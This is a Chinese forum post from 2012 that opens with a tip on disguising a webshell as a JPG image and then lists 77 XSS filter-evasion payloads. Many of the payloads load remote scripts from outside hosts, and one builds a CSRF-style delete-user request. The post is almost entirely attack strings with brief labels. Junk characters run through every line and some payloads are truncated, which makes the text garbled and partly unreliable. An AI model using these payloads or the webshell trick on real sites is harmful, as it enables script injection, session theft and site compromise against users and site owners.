跨站图片shell4 c* z& Q6 ^& e
XSS跨站代码 <script>alert("")</script>
) F ~' X: i4 p8 a" o# P7 ^! C9 ?1 X2 B! |* i. _
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
8 B) E% i3 x p0 q$ n
. ~( t! t$ C, I0 P2 M+ q3 z1 [: R/ s/ l
/ u0 L a8 R, l0 ]1)普通的XSS JavaScript注入
# J; ^7 T/ B9 H" g3 l/ ?<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>, w! @6 m3 B/ ~* ]+ ~; t
; U* D6 A1 e! n9 b8 O+ X' {
(2)IMG标签XSS使用JavaScript命令
1 o) C* c& _/ ?2 ?2 N% Z<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
0 w3 a% o" Z7 f: e. B$ y
9 B/ |- G: S. r7 ?* u(3)IMG标签无分号无引号
5 L# C; z1 |/ L9 g2 |<IMG SRC=javascript:alert(‘XSS’)>6 b$ j, Z8 Y# u
( q4 P, N1 h @. Q' P+ Y0 a: P' b& t
(4)IMG标签大小写不敏感, _( i4 z! e$ R# @5 b7 }" H7 z
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) [2 A' q2 \; _0 p* ^; e8 A& |$ f+ ?: A$ w
(5)HTML编码(必须有分号)8 B8 u0 P* j6 @# C
<IMG SRC=javascript:alert(“XSS”)>$ Y4 @; X, i% W; n3 G! e
0 h O4 s5 N' u- q; d1 d; j+ `& v
(6)修正缺陷IMG标签
! k% N$ |# i8 F$ [$ B, m7 e<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
* P" K+ M: |) ~. c9 i: O2 \% H Q% V& b. `( `
(7)formCharCode标签(计算器)
- |, m& q. z9 B; I& y<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>; k, S2 d, Z' a$ j6 N! F6 G9 t
+ c. z: w2 q9 ~& H2 r+ d/ k8 h
(8)UTF-8的Unicode编码(计算器)9 @. C6 C& r- K9 m) c, u
<IMG SRC=jav..省略..S')>
0 u/ i, n9 u, D" l& {3 ~+ }/ G/ q7 ?+ g% x, `- f+ U$ d! B2 O
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)' a; N0 F" q$ T- g! X9 Q. k
<IMG SRC=jav..省略..S')>
: {" X/ |8 }$ I. A8 P/ h2 |2 B2 _8 W+ h, G7 s
(10)十六进制编码也是没有分号(计算器), `; F1 i% Y* K
<IMG SRC=java..省略..XSS')>
8 n! T- ^* _! j0 q' U$ d3 U, n* R) e5 H. t, U) o* o
(11)嵌入式标签,将Javascript分开
- ~9 L E: D1 o" E U<IMG SRC=”jav ascript:alert(‘XSS’);”>+ ^! E/ l: E4 F1 X
7 R3 }$ G3 ?1 v) ]! I3 }
(12)嵌入式编码标签,将Javascript分开
% _# A* X% }. x9 u<IMG SRC=”jav ascript:alert(‘XSS’);”>- b2 v: _* V% Q
; q1 l+ _# d+ k' g9 ^/ Y(13)嵌入式换行符
$ v. x# i2 d7 V' G<IMG SRC=”jav ascript:alert(‘XSS’);”>
& @% N; A- Y G1 [& P% I6 Q' ~0 |1 ~
(14)嵌入式回车
5 R j- t& Y: h. d. f1 v q<IMG SRC=”jav ascript:alert(‘XSS’);”>
. `9 Y' |, x# B& }7 {
/ v/ p! n; _! t(15)嵌入式多行注入JavaScript,这是XSS极端的例子+ W# |2 J9 d) ^9 l$ Z6 z& C3 r
<IMG SRC=”javascript:alert(‘XSS‘)”>
2 O& k7 t7 x% O+ ?2 s
" u$ L7 y; a6 U% q% k(16)解决限制字符(要求同页面)
/ z z+ j% j; a2 j6 o<script>z=’document.’</script>
, ^* j) @2 Z8 [3 X7 H2 v2 n. V<script>z=z+’write(“‘</script>' ?. b3 S/ X5 t7 d2 R# ?) N- I3 S
<script>z=z+’<script’</script>1 k) i( W2 i" p7 n5 O3 S0 v; c& ^
<script>z=z+’ src=ht’</script>
6 B& R+ @; |. A! e/ o( p<script>z=z+’tp://ww’</script>
* I* u5 N: I4 R K2 P# \( g( a* D0 y<script>z=z+’w.shell’</script>
, f3 W3 |* M' O<script>z=z+’.net/1.’</script>
7 E1 z7 O; L/ k<script>z=z+’js></sc’</script>) ^$ t: X$ k% I1 z( \6 O
<script>z=z+’ript>”)’</script>
0 v$ s4 d5 S4 e( f<script>eval_r(z)</script>
/ J9 P1 p+ |/ \7 a: x% f' q& ~6 o0 H; O+ z" J+ `9 K$ A
(17)空字符$ f3 T( s f7 q
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# Z7 r7 y" X/ a0 W! B& J
- \0 N5 v3 A% r3 R( E(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用+ Q1 H& U/ z6 q4 L. ^7 f$ F( N
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' i4 l: u' z1 w _ Y: G
& g- X5 a9 a( S/ w! y(19)Spaces和meta前的IMG标签+ e9 I' T7 S3 a6 E/ H2 A O/ r5 a
<IMG SRC=” javascript:alert(‘XSS’);”>
: D5 A6 p* ?: \+ |0 q' h
5 s/ Z `# t7 b u2 O T6 ^/ R& S(20)Non-alpha-non-digit XSS
$ z" m5 }' f0 ~9 Y<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
" R- H3 S% z& i- w3 ]
: K- {7 N4 R: G2 R2 I" B(21)Non-alpha-non-digit XSS to 2
0 U$ d6 E- ~8 ^: b' G& O<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>* l2 w' n1 l9 X* L# c* M
" j; ]6 E# M8 v, y/ k/ D5 L0 ~2 A(22)Non-alpha-non-digit XSS to 3
+ p- g, s- w! V! v<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>& x' W7 t- I! P# @; }
$ d i' N2 ?7 e, U7 |(23)双开括号5 T) y) P9 a+ a
<<SCRIPT>alert(“XSS”);//<</SCRIPT>0 O. a3 y" u5 u+ {; o @ W
- p7 b1 h$ e3 y! I
(24)无结束脚本标记(仅火狐等浏览器)
, y2 J# q$ Z, B' N0 H; U<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
6 P5 i- `: P) B1 ^% T/ t: b1 z7 V, Y) k3 H- u. m
(25)无结束脚本标记2
- T# G4 K/ w& Y( G& A; ?<SCRIPT SRC=//3w.org/XSS/xss.js>
\* j2 r3 K o2 G+ w0 {: O
! O" h" ^0 S) V* C(26)半开的HTML/JavaScript XSS
; s1 ]# o f, D* x( O+ h<IMG SRC=”javascript:alert(‘XSS’)”. w, C) A" I) o+ W- F( g
3 o/ d. d/ F* N3 D5 O9 Q+ f& U5 R(27)双开角括号
. H+ j: O9 V# ?<iframe src=http://3w.org/XSS.html </ E& B& h2 s0 l, z) M
! J8 G2 i: H% a H) Y8 ](28)无单引号 双引号 分号) |9 e+ G4 r- I
<SCRIPT>a=/XSS/& T( {" T' C; Z3 J F
alert(a.source)</SCRIPT>
& ~. ^$ h \9 B$ D) V) t/ y
. ^3 y1 ~# o2 q; Y6 X" Y: T! u4 E9 ~(29)换码过滤的JavaScript
7 H; B# E W3 p. C @\”;alert(‘XSS’);//
1 E' M. G2 U: l* P$ z; W
! @, q! C: W1 p2 T# L(30)结束Title标签
. b2 T8 F* s' i; K</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>4 Y5 b4 @$ Q$ k) D7 m: d3 A! W
3 | O* u0 _$ [: J# r
(31)Input Image
! s* e/ n4 j- |* M<INPUT SRC=”javascript:alert(‘XSS’);”>
3 w5 }" j) R* ]; e! `: Y3 f9 Z) h* p$ ], K! Z# A/ n# I+ D
(32)BODY Image; {: j* y" N6 ~- U" ^2 g+ U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>6 N7 |) y: Z Y
5 G' K1 h1 Z/ X$ e4 G3 |
(33)BODY标签7 Z- C9 Z# Q7 \0 [" c. l- T
<BODY(‘XSS’)>* h2 H, O: `: N) R2 n& V6 h& U6 @; \
8 [6 y2 d e7 ?5 l0 f
(34)IMG Dynsrc
0 K0 R6 E( {( R( x% [<IMG DYNSRC=”javascript:alert(‘XSS’)”>
% f. L+ e* y% Y8 l5 M/ M8 L' \7 X' J' z
& q* p5 D F; K! w(35)IMG Lowsrc9 v9 ]$ ?6 u& T5 \2 w
<IMG LOWSRC=”javascript:alert(‘XSS’)”>7 C/ y* }+ C& ]% s9 L5 b; f# I7 \
6 F. i* H. ?1 J9 w
(36)BGSOUND
7 r, l% Z# O$ e: j+ H<BGSOUND SRC=”javascript:alert(‘XSS’);”>1 k+ ?- f, |# i" C S
9 c5 F& x4 E$ p( R( A, y1 r# j
(37)STYLE sheet2 p0 [$ x1 o* |1 N
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>% V. F3 h6 W0 V' P6 V& i: j6 \
4 G5 q. h$ ^ I& o! U" f(38)远程样式表3 u0 e" m& k" x y) s+ j" Y
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
4 I$ E) _& q3 \" v# I; S+ L0 |: P: s5 I7 l! \* q" e
(39)List-style-image(列表式)4 W& D$ Q/ t2 a1 V& f
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS- r z5 P! ^. F
) Y) M' k1 N+ ?- \/ H! U8 ^
(40)IMG VBscript
" i3 |4 g+ A/ \0 Y+ e<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS# \4 A& s) r- m( l- s% `" a
3 ~$ v/ c) ^3 P1 c0 [$ e- S# f(41)META链接url/ Q" I3 |1 ]" _% A
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>5 }# o+ F) {3 A, c
/ Y: n% ~" z. c(42)Iframe" J! `6 l, B! |: a$ W3 b% d, I
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>" y4 i- j! p0 T j, ^
(43)Frame
' w% @ v$ y- H# n9 e<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
+ J3 W* W. [1 Y h2 d
! s M I% M3 O' ?+ t(44)Table
- _' z+ k9 o V1 s<TABLE BACKGROUND=”javascript:alert(‘XSS’)”> d- [$ I; t3 j' q
( d9 e+ N, p8 O(45)TD7 d& l) ^0 @$ `8 P. f4 b
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% }, Q1 r- G. p2 z6 l' Q3 Z7 z
, t0 B/ m- n) Z j4 T" A2 ~" w
(46)DIV background-image
7 z# Q/ ^& W- u- \6 N<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! i1 l! Z; Z% U
; N( [) J7 @% x3 x8 R. U/ t
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279) @' s6 p0 e. B- n: v
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
: D( \( \4 D- Z3 E8 I
# U; j$ f# m# C$ i$ ~$ a: Y* w(48)DIV expression
/ v; e5 T6 Y& F( n, A/ m4 z<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
$ \4 b) W; Y1 F" Z8 m Q) f/ J+ `* t
(49)STYLE属性分拆表达$ z7 _" j9 P3 s5 K6 L
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>; t& n, |& ]: e( X4 W1 b6 ?
( _6 B0 o% M5 Z6 i6 T# z7 |
(50)匿名STYLE(组成:开角号和一个字母开头)1 L$ q6 F' |% \, B8 O" }6 R
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" c; m0 m4 U ]# [) \0 f, y4 x/ Y- S2 E$ T9 K/ a! n7 _
(51)STYLE background-image
, I6 O8 ^8 ?: L<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
1 K* \) g4 h9 M: O6 Q0 v2 n# N- Q$ h# @1 x! x
(52)IMG STYLE方式
- q( t q3 H/ p9 aexppression(alert(“XSS”))’>
6 ~; `8 o2 k8 w, O3 L/ E3 H
6 H: D0 j/ \1 W0 }2 ]- y. B- ^" s(53)STYLE background" x6 o# e; p! ^, w
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
+ H+ V7 x% m8 S: `% E: s
* v1 s: m# F; S, E1 h% |( }(54)BASE
$ \- @- f: K! w. I<BASE HREF=”javascript:alert(‘XSS’);//”>( l! s9 h/ X; F9 z3 c! L! \
) q% {0 C/ t! f& n8 T3 D4 \(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
4 J* X! s6 R& L5 @. D<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
4 F3 _; P8 d, E* z9 P( T! S \( [# r( F+ n9 x
(56)在flash中使用ActionScrpt可以混进你XSS的代码; }2 k6 n6 m, H
a=”get”;: D0 J4 I: ~0 ^3 X
b=”URL(\”";7 c& O1 J) ]2 D$ _' k( ^8 j1 ?
c=”javascript:”;+ @ R7 z; H# w; q" `$ |5 y
d=”alert(‘XSS’);\”)”;7 k% ?6 n5 Q4 q5 D: z; H8 V( ?
eval_r(a+b+c+d);
6 X! B6 I: u2 G" U7 b1 J5 m
$ [7 W v0 r9 M(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上; N1 A) w" ?" x7 l+ H! T! z/ L
<HTML xmlns:xss>! R/ e0 `, G* [# S* A* P
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' @: @* Z, K6 ]; r5 g<xss:xss>XSS</xss:xss>
6 p; d8 R' i1 t. Y: Z</HTML>/ r" R9 S- z9 a1 H# j
1 l! X8 N) |4 z- u1 X& Y( s
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
. e& \. f& d8 ?9 c& ~$ V6 z# h! W<SCRIPT SRC=””></SCRIPT>5 n9 [1 n8 V3 S$ l
# }/ ^* j! u5 J3 O7 }$ O' i(59)IMG嵌入式命令,可执行任意命令+ I9 r) J& [+ F7 C- E) e. j
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
7 A5 J. `! G6 y! K6 w! p
5 L4 u- U: f% y(60)IMG嵌入式命令(a.jpg在同服务器)
3 ~4 W) p+ A3 Z6 o t# i% E; IRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
! I. }6 { K; @) O7 g; G
6 R1 q" W( `& W D7 a1 ^(61)绕符号过滤! x+ n1 G$ e4 m- S
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>0 d7 V' ]( c" c
^1 U) z5 Q# x6 I( k! Q$ E
(62)
! c2 X+ v! W) J7 R<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT> \. D6 ~& t- w/ C& X
5 d- k5 H) l4 s) y- I
(63)
F8 ?+ J9 A: F- E' X q2 Y<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
. r* s2 I9 R5 g3 y- _8 O/ a9 ~4 j1 m) T& m+ m g
(64)3 n! J. r( f$ ~% h
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>+ _# W2 N" E: b# J* r& W
* V, m9 {" k) F, I( y+ K(65)/ I h% n% K; }5 f
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>8 w# f2 q! k# W) Y8 m' ]
& e9 o' p' P: V! t6 w8 k) Y
(66)
0 ^( X* F3 S B+ I3 D5 Y. m5 ?. q( e3 ]<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
# j6 N+ Z4 `, c1 J) s+ J% D5 n* B
; o4 j+ J2 t- x3 m' ?(67): u( ]9 s; B* [* C* o( n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>* L Y: y! K+ V* C3 D# m( |
3 y! i" G. s6 d, o(68)URL绕行: f' B0 T3 w7 f |% E
<A HREF=”http://127.0.0.1/”>XSS</A>& N0 h7 n/ v. {) q! I' G# E9 V
7 D T: R5 U* V% T
(69)URL编码% R5 o8 b+ I; |- z: t
<A HREF=”http://3w.org”>XSS</A>
0 C# L# G- M# k: W4 ^" u- o
3 W; i/ [/ _( S% w7 O(70)IP十进制
1 D" A2 m6 e: P h; `<A HREF=”http://3232235521″>XSS</A>
# e( E# k+ s2 F8 o0 Q
2 x5 E( o3 c! V, @(71)IP十六进制$ @: z0 Y# g" J. H7 f2 o
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>0 m: k! e& i3 x: b. n6 X1 U
1 e* A& x5 U; _$ [3 X+ f
(72)IP八进制
: j9 O& P2 I0 x% A3 O2 O<A HREF=”http://0300.0250.0000.0001″>XSS</A>( Z) M/ A7 U. e7 q' [
' c6 T# }8 f* N6 L( c4 ~
(73)混合编码7 \4 ]! O+ ~$ N) C
<A HREF=”h
; C. @5 G% f; _" utt p://6 6.000146.0×7.147/”">XSS</A>5 m% E6 a0 W4 r: l2 h$ J' v% c q
# k2 L/ Y1 q4 |; h3 ~- X; @(74)节省[http:]6 {0 ~& S1 w. m; u2 Q4 E4 g$ h) U
<A HREF=”//www.google.com/”>XSS</A>
8 s* n" P, I. `( i# b+ _+ e$ D3 P
9 \ F6 C; W' P! D( {$ p4 W) q(75)节省[www]
, | W5 c" ~ V0 r! f<A HREF=”http://google.com/”>XSS</A>1 f" E u: s+ x( J
- Z3 a% |$ G4 N; _9 {
(76)绝对点绝对DNS
' S1 v/ J) N4 ~' G/ k/ Q1 w<A HREF=”http://www.google.com./”>XSS</A>
9 n- i; z0 D) N& R2 D7 z: J4 h: `0 ^0 u# O1 v2 S
(77)javascript链接: @- d3 {! W; A d9 }( g! P4 I
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
3 ~8 F3 ~1 f6 u4 e3 Y) K; M5 { |
发表于 2012-9-13 17:04:56
收藏
支持
反对